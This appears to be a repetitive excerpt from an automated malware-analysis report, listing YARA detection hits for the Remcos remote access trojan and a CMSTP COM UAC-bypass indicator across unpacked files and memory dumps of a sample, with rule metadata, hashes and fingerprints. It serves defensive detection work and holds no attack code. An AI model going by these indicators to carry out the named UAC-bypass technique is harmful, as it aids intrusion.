              Source: 33.2.outvaunts.exe.10c0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 33.2.outvaunts.exe.10c0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 33.2.outvaunts.exe.10c0000.0.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 25.2.outvaunts.exe.780000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 25.2.outvaunts.exe.780000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 25.2.outvaunts.exe.780000.0.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 13.2.outvaunts.exe.1140000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 13.2.outvaunts.exe.1140000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 13.2.outvaunts.exe.1140000.0.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 25.2.outvaunts.exe.780000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 25.2.outvaunts.exe.780000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 25.2.outvaunts.exe.780000.0.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 6.2.outvaunts.exe.690000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 6.2.outvaunts.exe.690000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 6.2.outvaunts.exe.690000.0.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 24.2.outvaunts.exe.f30000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 24.2.outvaunts.exe.f30000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 24.2.outvaunts.exe.f30000.0.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 11.2.outvaunts.exe.200000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 11.2.outvaunts.exe.200000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 11.2.outvaunts.exe.200000.0.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 20.2.outvaunts.exe.730000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 20.2.outvaunts.exe.730000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 20.2.outvaunts.exe.730000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 29.2.outvaunts.exe.1f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 29.2.outvaunts.exe.1f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 29.2.outvaunts.exe.1f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 10.2.outvaunts.exe.6f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 10.2.outvaunts.exe.6f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 10.2.outvaunts.exe.6f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000019.00000002.491126682.0000000000780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000019.00000002.491126682.0000000000780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000019.00000002.491126682.0000000000780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000023.00000002.502121534.00000000010F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000023.00000002.502121534.00000000010F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000023.00000002.502121534.00000000010F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000014.00000002.486635127.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000014.00000002.486635127.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000014.00000002.486635127.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0000001D.00000002.495335486.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0000001D.00000002.495335486.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0000001D.00000002.495335486.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0000001E.00000002.497633838.0000000001190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0000001E.00000002.497633838.0000000001190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0000001E.00000002.497633838.0000000001190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000007.00000002.462606434.0000000001080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000007.00000002.462606434.0000000001080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000007.00000002.462606434.0000000001080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000013.00000002.484506000.0000000001100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000013.00000002.484506000.0000000001100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000013.00000002.484506000.0000000001100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0000000F.00000002.477654786.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0000000F.00000002.477654786.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0000000F.00000002.477654786.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0000001F.00000002.497407700.0000000001190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0000001F.00000002.497407700.0000000001190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0000001F.00000002.497407700.0000000001190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000026.00000002.507081742.0000000001120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000026.00000002.507081742.0000000001120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000026.00000002.507081742.0000000001120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000027.00000002.507117715.0000000000FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000027.00000002.507117715.0000000000FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000027.00000002.507117715.0000000000FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0000000B.00000002.470039359.0000000000200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0000000B.00000002.470039359.0000000000200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0000000B.00000002.470039359.0000000000200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0000001C.00000002.495612198.0000000001110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
